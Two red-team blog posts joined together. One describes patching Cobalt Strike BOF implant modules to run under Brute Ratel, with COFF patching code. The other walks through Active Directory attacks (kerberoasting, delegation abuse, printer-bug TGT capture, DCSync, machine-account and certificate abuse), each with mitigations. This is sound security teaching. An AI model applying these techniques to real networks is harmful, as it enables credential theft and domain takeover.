There are lots of COFF parsers out there that allow you to parse existing or create new COFF files. Only very few also allow for modification of existing files though. Since I wanted to stick with Python for the tooling for this project and couldn’t find a suitable solution for my needs, I decided to implement this functionality based on a Python library I programmed in the past: structex.

The idea of structex is that, as a developer, you don’t imperatively write down code to serialize or deserialize individual fields of data structures but instead describe the data structure to your application. The library then does the heavy-lifting and figures out which field is at what offset and does all the (de-)serialization for you. Then you can just have your application map data structures to some binary buffer and access fields of those structures like you access fields in Python classes. Here’s a brief example:

class MachineType(IntEnum):
    IMAGE_FILE_MACHINE_I386 = 0x014c
    IMAGE_FILE_MACHINE_IA64 = 0x0200

class coff_file_header(Struct):
    # ...
    _machine: int = Primitive(uint16_t)
    NumberOfSections: int = Primitive(uint16_t)

    def Machine(self) -> MachineType:
        return MachineType(self._machine)

# Load BOF into memory & parse header
memory = BufferMemory.from_file('bof.o')
bof_header = coff_file_header(memory, 0)

bof_header.NumberOfSections = 0

# Write modified BOF back to disk
# bof_modified.o has now set its NumberOfSections to 0

All that I needed to do then was write down the data structures used in COFF, add some property decorators for even easier handling, and implement some bits of custom logic (e.g. reading & modifying the COFF string table). This allowed me to easily parse, inspect and modify any BOF files.

Debugging BOFs: COFFLoader

Implants are mainly designed to operate covertly, leave very few traces, and avoid getting noticed (and for that matter, sometimes even actively evade detection). This can make them hard to locate, observe and make sense of – not exactly ideal conditions for debugging. So I went out looking for alternatives.

It’s safe to assume that any program that executes BOFs does that in a way that is somewhat similar to TrustedSec’s COFFLoader. So why not use COFFLoader then? Well, it doesn’t support BRC4’s BOF API. Considering that COFFLoader is open source and the BRC4 API is pretty limited (as shown in our first blog post TODO: Insert link), it wasn’t terribly difficult to implement that functionality. I basically only needed to

  • provide simple implementations of the BRC4 APIs,
  • update COFFLoader’s InternalFunctions array to point to the Badger* APIs,
  • update hardcoded uses of the length of InternalFunctions,
  • update the check for symbol prefixes to check for the Badger prefix and
  • update the signature and exact call of the BOF entrypoint.

Since I didn’t want to spend much time on this, I kept the implementations of the BRC4 APIs very simple and didn’t add any sanity checks (or even proper formatting):

size_t BadgerStrlen(CHAR* buf) { returnstrlen(buf); }
size_t BadgerWcslen(WCHAR* buf) { return wcslen(buf); }
void* BadgerMemcpy(void* dest, const void* src, size_t len) { return memcpy(dest, src, len); }
void* BadgerMemset(void* dest, int val, size_t len) { return memset(dest, val, len); }
int BadgerStrcmp(const char* p1, const char* p2) { return strcmp(p1, p2); }
int BadgerWcscmp(const wchar_t* s1, const wchar_t* s2) { return wcscmp(s1, s2); }
int BadgerAtoi(char* string) { return atoi(string); }
PVOID BadgerAlloc(SIZE_T length) { return malloc(length); }
VOID BadgerFree(PVOID* memptr) { free(*memptr); }
BOOL BadgerSetdebug() { return TRUE; }
ULONG BadgerGetBufferSize(PVOID buffer) { return 0; }

int BadgerDispatch(WCHAR** dispatch, const char* __format, ...) {
    va_list args;
    va_start(args, __format);
    vprintf(__format, args);
int BadgerDispatchW(WCHAR** dispatch, const WCHAR* __format, ...) {
    va_list args;
    va_start(args, __format);
    vwprintf(__format, args);

I’m not very familiar with using gbd for debugging and do most of my coding in Visual Studio and Visual Studio Code and debugging in x64dbg. That’s why I also used this opportunity to set up COFFLoader as a Visual Studio solution. Now I could use COFFLoader to run my BOFs and Visual Studio and x64dbg to debug both COFFLoader and my CS2BR BOFs, neat!

Compiling & debugging in Visual Studio

V. Finally: The CS2BR Binary Patching Workflow

RE: Rewiring CS BOF APIs

On the matter of actually rewiring CS BOF API imports, there are two things to consider:

  1. The relocations to the imports themselves are relative to the instruction using/calling them.
  2. The imports referenced by the code are pointers to the actual implementations.

Writing this, I realize that all of this sounds pretty abstract, so let’s have a look at an example:

Our bof.o sends text back to operators by using the BeaconPrintf API. Because of that, bof.o imports the API by defining a __imp_BeaconPrintf symbol. This symbol refers to a place in memory where a pointer to the actual BeaconPrintf is stored.

For binary patching in CS2BR this means that we need to overwrite these pointers in bof.o to the actual implementations somehow so they point to CS2BR’s methods. These pointers are set by the loader (e.g. COFFLoader) though and that’s something we can’t control before or even at compile-time. So the question becomes: How can we make the loader point imports to CS2BR’s methods instead?

After staring at Ghidra, x64dbg, objdump output and my Python source code for more days than I’m comfortable to admit, I worked out a solution to this problem. It consists of some preparations and two processing phases that I’ll further detail in the following paragraphs.

The general idea is pretty simple:

CS2BR binary patching

CS2BR defines pointers (prefixed with __cs2br_) to its compatibility layer’s methods. These pointers will also end up in its symbol table. After merging both object files, the __imp_ symbols (that originated from bof.o) to CS BOF APIs are replaced with the __cs2br_ symbols (provided by cs2br.o). This leaves us with symbols that are referenced relative to instructions and contain pointers to our desired CS2BR compatibility layer methods.

Here’s how the complete workflow is implemented in CS2BR:

1. Declaring the go entrypoint

As described earlier in this blog post, the compiled CS2BR object file needs to contain an external reference to the go entrypoint. To do so, I just added the a declaration of this method to CS2BR’s the stub: extern void go(void *, int);

This will make ld correctly resolve this symbol to the BOF’s entrypoint when we merge both object files.

2. Creating proxy symbols

Next, I added pointers to all of the CS BOF APIs implemented in CS2BR’s compatibility layer:

void* __cs2br_BeaconDataParse __attribute__((section(".data"))) = &BeaconDataParse;
void* __cs2br_BeaconDataInt __attribute__((section(".data"))) = &BeaconDataInt;
void* __cs2br_BeaconDataShort __attribute__((section(".data"))) = &BeaconDataShort;
// ...

3. Preprocessing the BOF

Before merging object files, CS2BR identifies all CS BOF API import symbols (named __imp_Beacon*) and reconfigures them:

for symbol_name in cs_patches:
  symbol = osrcbof.get_symbol_by_name(f"__imp_{symbol_name}")
  symbol.Value = 0
  symbol.SectionNumber = 0
  symbol.StorageClass = StorageClassType.IMAGE_SYM_CLASS_EXTERNAL
  symbol.Name = symbol_name
  symbol.Name = f"__cs2br_{symbol_name}"
  symbol._type = 0

This reconfiguration achieves that the symbols are

  • treated as external (section number 0, storage class IMAGE_SYM_CLASS_EXTERNAL, type 0) and
  • renamed from __imp_* to __cs2br_*, which alles ld to resolve them to cs2br.o‘s defined symbols upon merging.

Then CS2BR renames the symbols of windows APIs that are available to CS BOFs by default (LoadLibraryGetModuleHandleGetProcAddress and FreeLibrary) so they have the __imp_KERNEL32$ prefix. This ensures that, if any of those APIs are used by the BOF, BRC4 imports and links them before executing the BOF.

4. Merging both object files

Both object files (bof.o and cs2br.o) are merged using ld. The resulting object file contains the sections and symbols of both files.

5. Recalculating ADDR64 relocations

At this point, both COFFLoader and BRC4 should be able to load and execute the patched BOF. Instead, COFFLoader just crashed and BRC4 gave me the silent treatment.

It turned out that the relocations were flawed and presumably not recalculated by ldI’ll briefly describe that bug right now, you can skip to my workaround if you want to.

Broken relocations

Relocations are a tricky topic. In fact I don’t think I got my head fully wrapped around the topic myself. When I tested my BOFs at that point and saw COFFLoader crashing, I did a lot of manual investigation by debugging COFFLoader and tracing back why it crashed. Let’s have a look at an example:

We’ll execute a very simple BOF that only formats and outputs a string using BeaconPrintf:

#include <windows.h>
#include "beacon.h"

VOID go(IN PCHAR Args,  IN ULONG Length) {
    BeaconPrintf(CALLBACK_OUTPUT, "Hi from CS2BR %i\n", 1337);	

When executing the BOF in COFFLoader, it would end up executing some data, not actual instructions:

Silly COFFLoader executing data

Inspecting the address of RIP in the dump, we can see that RIP lies in the .rdata section of the BOF as we can clearly see the strings used in cs2br.o‘s entrypoint:

.radata in x64dbg

By restarting and carefully stepping through the program we see that the coffee entrypoint is invoked correctly, so that bit works just fine:

Proof that our entrypoint works!

It also reaches the go entrypoint:

Proof that go is called

The next call will fail though. It retrieves the address of the method to call from a pointer (mov rax, qword ptr ds:[7ff45d050068]) and calls that. Taking a look at the memory dump of the address of the pointer, we see that this is our .data section:

Proof that the pointers are garbage

The 0xDEADBEEFDEADBEF is a dummy value I made COFFLoader pass to the coffee entrypoint to use as the _dispatch variable. CS2BR saves this _dispatch variable as a global variable in .data as can be seen in the objdump output:

$ objdump -x minimal.BR_bin21.o | grep "sec  3"

[ 36](sec  3)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .data
 0x0000000000000068 __cs2br_BeaconPrintf
[ 43](sec  3)(fl 0x00)(ty    0)(scl   2) (nx 0) 0x0000000000000050 __cs2br_BeaconFormatPrintf
[ 44](sec  3)(fl 0x00)(ty    0)(scl   2) (nx 0) 0x0000000000000088 __cs2br_BeaconIsAdmin
[ 45](sec  3)(fl 0x00)(ty    0)(scl   2) (nx 0) 0x0000000000000000 _dispatch
[ 46](sec  3)(fl 0x00)(ty    0)(scl   2) (nx 0) 0x0000000000000070 __cs2br_BeaconOutput
[ 47](sec  3)(fl 0x00)(ty    0)(scl   2) (nx 0)

As expected, the call fails at this point as it jumps to 0x00007FF45D0705E1 which is just some random offset into a method:

Broken relocations jumping into random functions

It should be pointing to 0x00007FF45D070621 though, as the .text section is mapped to 0x00007FF45D070000 and BeaconPrintf‘s offset into this section is 0x621. Apparently, the value of the pointer to BeaconPrintf is a whopping 0x40 bytes short. This left me confused for quite a while. And just by accident, I noticed something in the objdump output:

Idx Name          Size      VMA               LMA               File off  Algn
  0 .text         00000dc0  0000000000000000  0000000000000000  000000b4  2**4
  5 .data         00000200  0000000000000000  0000000000000000  00001380  2**5
                  CONTENTS, ALLOC, LOAD, RELOC, DATA

[  2](sec  1)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .text
[ 28](sec  1)(fl 0x00)(ty   20)(scl   2) (nx 0) 0x0000000000000621 BeaconPrintf
[ 34](sec  1)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000040 .text
[ 42](sec  3)(fl 0x00)(ty    0)(scl   2) (nx 0) 0x0000000000000068 __cs2br_BeaconPrintf

OFFSET           TYPE              VALUE
0000000000000027 IMAGE_REL_AMD64_REL32  __cs2br_BeaconPrintf-0x0000000000000068

OFFSET           TYPE              VALUE
0000000000000068 IMAGE_REL_AMD64_ADDR64  .text-0x0000000000000040

Did you spot it? There are two .text symbols, of which one has an offset of 0x40 into the .text section. That same odd symbol is used in relocations of the __cs2br_* symbols.

The ADDR64 relocations for the entries in .data could be read as: “Read the relocation’s current value from its offset into .data (aka its ‘addend’), add to it the absolute address of the .text-0x40 symbol, and write the calculated sum back at the relocation entry’s offset in .data.” This doesn’t quite work though: these relocations aren’t relative to a symbol but to the section their symbols reside in. Thus, COFFLoader correctly resolves the relocation to the address of the .text section plus the relocation’s addend 5E1. We know the relocation’s addend is 5E1 by simply extracting it:

# 5096 is the decimal representation of 1380h (.data offset into the file) + 68h (relocation offset)
od -j 5096 -N 8 -t x8 minimal.BR_bin.o
0011750 00000000000005e1

Here’s where the workaround finally comes into play!

(Cont:) 5. Rebasing ADDR64 relocations

Lastly, CS2BR recalculates relocations that

  • are of type IMAGE_REL_AMD64_ADDR64 and
  • are associated to a symbol that doesn’t refer to a section but to an offset within a section (e.g. .text-0x40).

For each of those relocations, it will acquire their current addend, add to it the value of the associated symbol, and write the newly calculated addend back to the image, as can be seen here with the __cs2br_BeaconPrintf symbol:

[INFO] Pointing relocation .data:0x68 from .text:0x40+0x5e1 (=> __cs2br_BeaconPrintf) to .text:0x621 (=> BeaconPrintf)...

VI. Demo

Patching a BOF using cs2br is very simple. One only needs to compile the compatibility layer (cs2br.o) and supply & run the script with paths to the BOF file to patch and the cs2br.o:

CS2BR Binary Patcher

Running a BOF that was binary-patched by CS2BR works great in COFFLoader:

COFFLoader runs our patched BOFs!

Not so much in BRC4 though:

BRC4 doesn't

At this point, there wasn’t much I could do. I certainly didn’t feel like putting more work into it and testing against a black box didn’t make much sense.

That's it.

I did reach out to Chetan Nayak, the developer of BRC4, via Discord a couple of times during the project. Since this was an internal project at the time however, I couldn’t share CS2BR’s source code. Provided with a fully patched binary, they said the entrypoint was not found and never executed by the badger. Apparently, debugging this blob could take a lot of time and they can’t provide support for such BOFs.

This marks the end of my work on this project – for now.

VII. Conclusion & Outlook

This was one long blog post to write. Working on the tool and debugging BOFs certainly took a long time – I honestly underestimated the effort of documenting all of it in this post though. So, let’s have a look at what CS2BR accomplished:

CS2BR’s source-code patching approach works very well and enables operators to use well-known and battle-tested BOFs that were formerly (almost) exclusive to CS now in BRC4. While it requires access to source code and recompilation of BOFs, it does provide a solid compatibility layer.

In its current iteration, CS2BR is able to patch binary CS BOFs and make them (on paper!) compatible with BRC4. It works well in a modified COFFLoader that provides a simple BRC4 BOF API but doesn’t seem to work with BRC4’s badgers. The reason as to why it doesn’t is a mystery to me. As such, this iteration of CS2BR effectively isn’t usable. Since this is an open-source project, everyone is free to have a look for themselves and maybe someone finds a solution – in which case I would be thrilled to learn all about it!

Both approaches, the source-code and binary patching, make use of the same custom entrypoint which, depending on the exact BOF being executed, requires encoding input parameters with the provided Python script. It would be nice to automate parts of those by parsing the CNA scripts that accompany the BOFs and making use of the BRC4 Ratel Server API to simplify the process.


To me, this project was a rewarding, albeit intense and at times frustrating, journey and deep-dive into BOF development and the COFF format. I certainly learned a lot! To be frank though, the fact that this isn’t a success-story leaves me quite unsatisfied.

I’ll be laying down my work on this project for now and provide support for the source-code patching approach. Maybe some day Chetan finds some time to look into his BOF loader, though, and lets me know what’s wrong with CS2BR’s approach to patching.

Since you made it this far, I can only assume that you are very interested in the topic (or skipped a fair bunch of this blogpost). I would love to know your thoughts on the topic, so please leave a reply!

Moritz Thomas

Moritz is a senior IT security consultant and red teamer at NVISO.
When he isn’t infiltrating networks or exfiltrating data, he is usually knees deep in research and development, working on new techniques and tools in red teaming.

Most common Active Directory misconfigurations and default settings that put your organization at risk


In this blog post, we will go over the most recurring (and critical) findings that we discovered when auditing the Active Directory environment of different companies, explain why these configurations can be dangerous, how they can be abused by attackers and how they can be mitigated or remediated.

First, let’s start with a small introduction on what Active Directory is.
Active Directory (AD) is a service that allows organizations to manage users, computers and other resources within a network. It centralizes authentication and authorization mechanisms for Windows devices and applications, making it easier for administrators to control access to network resources, enforce security policies, manage device configuration, etc.

Setting up an AD environment can be simple as it can be difficult depending on the organization’s size and requirements. In any case, AD comes with default settings and configurations that can be considered as dangerous and that may not comply with the security policies of your company. Administrators should be aware of these default configurations and take action to secure their environment by implementing best practices and security measures that align with their organization’s needs and risk appetite.

However, it may be difficult to identify these insecure configurations as they are not always well known to administrators. Moreover, new vulnerabilities may be identified later, as in the case of Active Directory Certificate Services (ADCS) where default templates can be abused to escalate privileges.

In the past two years, we reviewed AD environments of about 40 companies. When reviewing these environments, we noticed that some findings were quite recurrent. Some of these misconfigurations (or default settings) can have a significant impact on the security posture of a company and allow attackers to gain access to privileged accounts or to compromise the entire domain.

Let’s look at the 6 most common misconfigurations that could be abused by attackers to gain access to other systems or to compromise the environment.


Administrator accounts are allowed for delegation

In Active Directory, accounts can be delegated by default. This means that an application can act on behalf of a user (Kerberos delegation), impersonate a user anywhere within the forest (unconstrained delegation), or only impersonate the user to a specific service on a specific computer (constrained delegation).

If a delegation has been configured and if an attacker has access to the delegated system or account, they could try to impersonate an administrator account and move laterally or compromise the domain.

We found that, in almost all organizations audited, there was at least one privileged account for which the “This account is sensitive and cannot be delegated” setting was not enabled.

To abuse this default configuration, we first need to enumerate delegations. This can be done by using the Active-Directory PowerShell module:

Get-ADUser -LdapFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=16777216)(msDS-AllowedToDelegateTo=*))"
Figure 1: Output of the above "Get-ADUser" command
Figure 1: Output of the above command

Thanks to the above command, we know that a constrained delegation has been configured on the IIS account. We can now check the other properties of the IIS account:

Get-ADUser iis -Properties msDS-AllowedToDelegateTo
Figure 2: Output of the Get-ADUser iis -Properties msDS-AllowedToDelegateTo command
Figure 2: Output of the Get-ADUser iis -Properties msDS-AllowedToDelegateTo command

In this case, we can see that a constrained delegation has been configured on the IIS account to access the CIFS service of the WinServ-2022 server (Figure 2).

If we try to access the server using our low-privileged account, Bob, we get an error (Figure 3). This is expected because our account is not allowed to access this server.

Figure 3: Error message when trying to access the WinServ-2022 server with Bob
Figure 3: Error message when trying to access the WinServ-2022 server with Bob

As the IIS account is a service account, we can try to kerberoast the IIS account using Rubeus, for example (Figure 4). A kerberoast attack is a technique that attempts to retrieve the hash of an Active Directory account that has a Service Principal Name (also known as a service account). Note that in this example, we use the “rc4opsec” argument to only kerberoast service account that supports RC4 encryption, which is the default setting (we will go more in details in the “AES encryption not enforced on service accounts” section).

Figure 4: Kerberoasting of the IIS account
Figure 4: Kerberoasting of the IIS account

In this case, we were able to get the hash of the IIS account and crack the password using “John the Ripper”, which is “Password123”.

Figure 5: Generating the AES256 hash of the password
Figure 5: Generating the AES256 hash of the password

After generating the AES256 representation of the password, we can now use Rubeus to request an HTTP ticket to impersonate the domain administrator and gain access to the WinServ-2022 system. In this example, the HTTP ticket will allow us to run command on the WinServ-2022 server:

Figure 6: Generating an HTTP to impersonate the Administrator of the domain and gain access to WinServ-2022
Figure 6: Generating an HTTP to impersonate the Administrator of the domain and gain access to WinServ-2022

As mentioned before, we are allowed to impersonate the Administrator account because the “This account is sensitive and cannot be delegated” setting is not enforced by default.

After requesting and injecting the ticket that is used to impersonate the Administrator account in memory, we can access WinServ-2022 with the Administrator account:

Figure 7: Accessing WinServ-2022 and running command as the Domain Administrator
Figure 7: Accessing WinServ-2022 and running command as the Domain Administrator

This demonstrates that by compromising a poorly configured service account, any user can gain access to another system with domain administrator privileges. This could have been avoided by enabling the “This account is sensitive and cannot be delegated” setting on privileged accounts (e.g., Domain Admins, etc.), because the Administrator credentials would not be forwarded to another computer for authentication purposes.

The following dsquery command can be used to identify any user where the setting is not enabled:

dsquery * DC=LAB,DC=LOCAL -filter "(&(objectclass=user)(objectcategory=person)(!useraccountcontrol:1.2.840.113556.1.4.803:=1048576))"
Figure 8: Output of the above "dsquery" command
Figure 8: Output of the dsquery command

In this example, if this setting was enabled, the attacker would not have been able to gain access to WinServ-2022 as Administrator:

Figure 9: Enabling the flag for the Administrator account
Figure 9: Enabling the flag for the Administrator account
Figure 10: The attack fails when the flag is enabled
Figure 10: The attack fails when the flag is enabled

Another option is to add the accounts to the Protected Users group. The Protected Users is a group introduced in Windows Server 2012 R2. The goal of this group is to protect administrators against credential theft by not caching credentials in insecure ways. Adding accounts to this group will not only prevent any type of Kerberos delegations, but will also prevent:

  • CredSSO and Wdigest from being used;
  • NTLM authentication;
  • Kerberos from using RC4 or DES keys;
  • Renewal of TGT beyond a 4-hour lifetime.

Microsoft recommends adding a few users to this group first to avoid blocking all administrators in case of a problem. However, it is useless to add computers and service accounts to this group because credentials will always be present on the host machine.

Note that after adding administrators to this group, some organizations have experienced difficulties connecting to servers using RDP (Remote Desktop Protocol). This is because only the Fully Qualified Domain Name (FQDN) is supported when connecting to servers via RDP when the user has been added to the Protected Users group. In fact, when using an IP address to connect to a server with RDP, NTLM authentication is used instead of Kerberos. However, when the FQDN is used, Kerberos authentication will be used.

AES encryption not enforced on service accounts

When a user requests access to a service in Active Directory, a service ticket is created. This service ticket is encrypted using a specific encryption type and sent to the user. The user can then present this encrypted ticket to the server to access the service. There are different encryption types available, such as DES, RC4 and AES. The encryption type is defined by the msDS-SupportedEncryptionTypes attribute. By default, the attribute is not set and the domain controller will encrypt the ticket with RC4 to ensure compatibility. This could allow an attacker to perform a kerberoasting attack, as previously demonstrated.

This means that if AES encryption is not enabled on service accounts and RC4 is not specifically disabled, an attacker could try to request a Kerberos ticket for a specific SPN (Service Principal Name, which is used to associate a service to a specific account) and brute force its password. Then, if someone can retrieve the cleartext password, they will be able to impersonate the account and access all systems/assets to which the service account has access.

If weak encryption types are allowed, an attacker can try to kerberoast a service account without generating too much suspicious activity in the logs, and gain access to other systems within the environment as described above in the “Administrator accounts are allowed for delegation” section.

To identify the value of the msDS-SupportedEncryptionTypes attribute for all service accounts, the following dsquery command can be used:

dsquery * "DC=lab,DC=local" -filter "(&(objectcategory=user)(servicePrincipalName=*))" -attr msDS-SupportedEncryptionTypes samaccountname distinguishedName -limit 0 | FIND /i /v "KRBTGT" | SORT

It is important to note that if the value is blank or equal to 0, it will be interpreted as RC4_HMAC_MD5.

The msDS-SupportedEncryptionTypes attribute on service accounts should be modified to only allow AES instead of legacy protocols such as RC4 or DES. However, for backward compatibility or to validate everything is functional, the value of the attribute can be set to 28. This means that RC4, AES-128, and AES-256 will be allowed. Note that all clients should support AES encryption if systems are not running Windows 2000, Windows XP or Windows Server 2003.

Finally, after making sure everything is working as expected, the value can be modified to 24 to only allow AES-128 and AES-256, as shown on the following screenshot (Figure 11), or to 16 to only allow AES-256.

Figure 11: Output of the above "dsquery" command
Figure 11: Output of the dsquery command

Alternatively, you can edit the options of the account and check the following boxes (Figure 12). This will update the msDS-SupportedEncryptionTypes attribute.

Figure 12: Editing the account options to support Kerberos AES 128 and 256 encryption
Figure 12: Editing the account options to support Kerberos AES 128 and 256 encryption

If the attribute was set to 16 (meaning that only AES-256 is supported), we would not have been able to kerberoast the IIS account using the rc4opsec argument, as shown in Figure 13.

Figure 13: Comparison when the msDS-SupportedEncryptionTypes is set and not set
Figure 13: Comparison when the msDS-SupportedEncryptionTypes is set and not set

Moreover, if the rc4opsec argument is not used and the service account only allows AES encryption types, a 4769 event will be generated on the domain controller with the encryption type used (Figure 14). In this case, the encryption type is 0x12 (DES_CBC_MD5 and AES 256) which is not expected as the attribute is set to 0x10 (only AES-256).

Figure 14: Log showing the encryption type used
Figure 14: Log showing the encryption type used

A Blue team can use these events to identify kerberoasting activities on service accounts.

Finally, deprecated and insecure encryption types can be disabled via a GPO, as follows:

Figure 15: GPO allowing the secure encryption types and disabling the deprecated and insecure ones
Figure 15: GPO allowing the secure encryption types and disabling the deprecated and insecure ones

If an attacker tries to request an RC4 ticket for an account where only AES encryption types are allowed, the kerberoast attack will fail:

Figure 16: Kerberoast attack failing when the account only supports AES encryption types
Figure 16: Kerberoast attack failing when the account only supports AES encryption types

Note that the /usetgtdeleg parameter is used to request RC4 ticket for AES accounts.

Print spooler is enabled on Domain Controllers

According to Microsoft, the print spooler is an executable that manages the printing process by retrieving the location of the correct printer driver, loading the driver, scheduling the print job, etc.

In the past few years, the print spooler service has been affected by several zero-day vulnerabilities (such as PrintNightmare) allowing low privileged users to escalate their privilege, as the service is running with system level privileges. Many exploits are available, but we will not focus on these vulnerabilities.

The print spooler service can also be abused to gain access to the key of the kingdom, the hash of the KRBTGT account. By gaining access to the hash of this account, attackers will be able to forge Golden Tickets, meaning that they will gain almost unlimited access to the Active Directory domain (domain controllers, devices, files, etc.). An attacker can also perform a Skeleton Key attack to create persistence in the domain, as an example. This malware will inject itself inside the LSASS process and create a master password that will work for any account in the domain.

Indeed, when an unconstrained delegation has been configured on a server and when the print spooler service is running on at least one domain controller, it is possible to get the credentials of the domain controller where the service is running.

During our audits, we identified that more than 25% of organizations had configured unconstrained delegation on one or multiple machine accounts. In addition, the print spooler service was running on at least one domain controller in 75% of organizations.

Let’s see how an attacker could abuse these dangerous configurations.

First, we must find where an unconstrained delegation has been configured. This can be done using the Get-DomainComputer command from PowerView as follows:

Figure 17: List of computers where an unconstrained delegation has been configured
Figure 17: List of computers where an unconstrained delegation has been configured

Note that unconstrained delegation is enabled by default and required on domain controllers. In this example, WIN-7I6M16HF63I is the Domain Controller (DC).

We have already compromised the WinServ-2022 server where an unconstrained delegation has been configured. Moreover, the print spooler service is running by default on domain controllers. All the conditions are met to try to retrieve the hash of the KRBTGT account, so let’s give it a try!

We can use Rubeus on WinServ-2022 to extract all Ticket Granting Tickets (TGTs) and display any newly captured TGTs:

Figure 18: Using Rubeus to extract all captured TGTs
Figure 18: Using Rubeus to extract all captured TGTs

On our low privilege machine, we can use MS-RPRN, as an example, to force the domain controller to connect to WinServ-2022.

Figure 19: Forcing the DC to authenticated to WinServ-2022
Figure 19: Forcing the DC to authenticated to WinServ-2022

As expected, we captured a new TGT (Figure 20). The response from the DC contains the domain controller’s computer account Kerberos ticket.

Figure 20: Capturing the TGT from the DC using Rubeus
Figure 20: Capturing the TGT from the DC using Rubeus

We can now import this TGT to impersonate the DC:

Figure 21: Importing the TGT to impersonate the DC
Figure 21: Importing the TGT to impersonate the DC

Once the ticket has been imported, we can perform a DCSync attack using SharpKatz to get the KRBTGT hash.

Figure 22: DCSync attack using SharpKatz
Figure 22: DCSync attack using SharpKatz

We now have the hash of the KRBTGT account (Figure 22), which means that we successfully compromised the domain.

Thanks to the print spooler service running by default on DCs, we were able to trigger the service and make it authenticate to the WinServ-2022 service.

To mitigate this vulnerability, Microsoft recommends disabling the print spooler service on all domain controllers as a security best practice.

One way to identify domain controllers where the print spooler service is running is by using PingCastle, as shown in Figure 23. In this case, only the spooler module was executed and we can see that the service is active on the DC.

Figure 23: PingCastle scan returning all domain controllers where the Print Spooler service is running
Figure 23: PingCastle scan returning all domain controllers where the Print Spooler service is running

As mentioned above, the recommendation is to disable the print spooler service on domain controllers. This can be done using a GPO that will disable the service:

Figure 24: GPO to disable the Print Spooler service
Figure 24: GPO to disable the Print Spooler service

If the print spooler service was disabled, an attacker would not have been able to force the domain controller to connect to WinServ-2022.

Figure 25: Error message when the Print Spooler is disabled
Figure 25: Error message when the Print Spooler is disabled

Users can create machine accounts

First of all, let’s define what a machine account in Active Directory is. A machine account (or computer account) is an Active Directory object that represents a computer or a device connected to the domain. Like user accounts, machine accounts have different attributes that store information about the device, can be a member of security groups, can have Group Policies applied, etc.

By default, in Active Directory, everyone can create up to 10 machine accounts in the domain. This is due to the ms-DS-MachineAccountQuota attribute. According to the Microsoft documentation, this attribute is “the number of computer accounts that a user is allowed to create in the domain”.

This setting is defined in the Default Domain Controllers Policy.

Figure 26: Default value of the "Add workstation to domain" setting in the Default Domain Controllers Policy
Figure 26: Default value of the “Add workstation to domain” setting in the Default Domain Controllers Policy

Moreover, the current value of ms-DS-MachineAccountQuota can be found using this PowerShell command:

Get-ADObject ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota
Figure 27: Output of the above command
Figure 27: Output of the above command

In this example, the Default Domain Controller Policy Group Policy Object (GPO) and the attribute have not been modified and Authenticated users can create up to 10 computer accounts (Figure 26 and Figure 27).

To create a new machine account, the PowerMad module, written by Kevin Robertson, can be used as follows:

Figure 28: Creation of a new machine account using PowerMad
Figure 28: Creation of a new machine account using PowerMad

As expected, after creating 10 machine accounts, the user will no longer be able to create new machine accounts:

Figure 29: Error message when reaching the MachineAccountQuota limit
Figure 29: Error message when reaching the MachineAccountQuota limit

There is no attribute indicating the number of accounts already created by one specific user. However, the mS-DS-CreatorSID attribute of computer objects is used to determine how many computer accounts have been created by a specific user.

This information can be retrieved by using the Get-MachineAccountCreator command from the PowerMad module:

Figure 30: List of all machines accounts and their creator
Figure 30: List of all machines accounts and their creator

It is also possible to check who created a specific machine account by using the Active Directory PowerShell module:

Get-ADComputer MyComputer -Properties mS-DS-CreatorSID | Select-Object -Expandproperty mS-DS-CreatorSID | Select-Object -ExpandProperty Value | Foreach-Object {Get-ADUser -Filter {SID -eq $_}}
Figure 31: Information about the creator of the "MyComputer" machine account
Figure 31: Information about the creator of the “MyComputer” machine account

The user who created the machine account will be granted write access to different attributes such as msDS-AllowedToActOnBehalfOfOtherIdentity, ServicePrincipalNames, DnsHostName, and so on.

Tools like KrbRelayUp leverage this default setting to escalate privileges to NT\SYSTEM on a local system. An attacker can also change the msDS-AllowedToActOnBehalfOfOtherIdentity to abuse Resource-Based Constrained Delegation, for example.

If a Public Key Infrastructure (PKI) is present in the domain, an attacker can take advantage of the default Machine certificate template to perform a DCSync attack and dump hashes of all users and computers. Let’s take a look at how an attacker can proceed to retrieve the hashes.

After creating a new machine account, an attacker can modify the ServicePrincipalNames and the DnsHostName attributes. First, we remove the service principal names containing the initial DnsHostName and then we set the DnsHostname attribute to the domain controller FQDN, as follows:

Figure 32: Default values of the new machine account attributes
Figure 32: Default values of the new machine account attributes
Figure 33: Modification of the DNSHostName attribute of the machine account to the DC FQDN
Figure 33: Modification of the DNSHostName attribute of the machine account to the DC FQDN

After that, an attacker can request a certificate for the machine account using the Machine template and they will get a certificate for the domain controller. This will allow the attacker to retrieve the NT hash of the domain controller machine account.

Figure 34: Retrieval of the NT hash of the domain controller machine account
Figure 34: Retrieval of the NT hash of the domain controller machine account

The hash can then be used to perform a DCSync attack:

Figure 35: DCsync attack using
Figure 35: DCsync attack using

By creating a new computer object, editing its properties and abusing the default Machine template, we were able to dump the hashes of all users. The hashes can then be used to perform a “Pass-the-Hash” attack and move laterally to other systems.

This could have been avoided if some mitigation measures had been put in place.

First, computer objects created using the PowerMad tool will be stored in the Computers container as opposed to other computer objects created by IT administrators. Indeed, they should be put in specific OUs as Group Policies can’t be applied on the container. This can be used to identify any objects created by malicious users.

Moreover, it is recommended to create a new group (or a new account) that will be granted the required permissions to create new machine accounts. This way, only members of this group will be allowed to create new computer objects and malicious users will not be able to perform the attack.

This can be done by modifying the Default Domain Controller Policy. To do so, go to Computer configuration > Policies > Windows Settings > Security Settings > User Right Assignment > Add workstations to domain: Remove the ‘Authenticated Users’ group and add the new group or account previously created.

Authenticated users will no longer be able to create new machine accounts, as shown in Figure 36.

Figure 36: Error message when a user tries to create a new machine account (after removing the permission of the Authenticated Users group)
Figure 36: Error message when a user tries to create a new machine account (after removing the permission of the Authenticated Users group)

Unchanged GPOs are not reprocessed on Domain Controllers

All domain joined systems refresh and apply applicable group policies at specific intervals.

For security policy settings (, the Group Policy engine works differently and these settings are automatically re-applied every 16 hours even if the GPO has not been changed.

However, by default, most GPO settings are only applied when they are new or when they have been changed since the last time the client requested them. This could allow an attacker to modify a registry key that is normally managed through a GPO to disable specific security measures, for example.

In the following example, a company enforces the Windows Defender Real-Time Protection through a GPO:

Figure 37: GPO to enable Windows Defender Real-Time Protection
Figure 37: GPO to enable Windows Defender Real-Time Protection

If a user tries to download malicious files, Windows Defender will immediately quarantine the files:

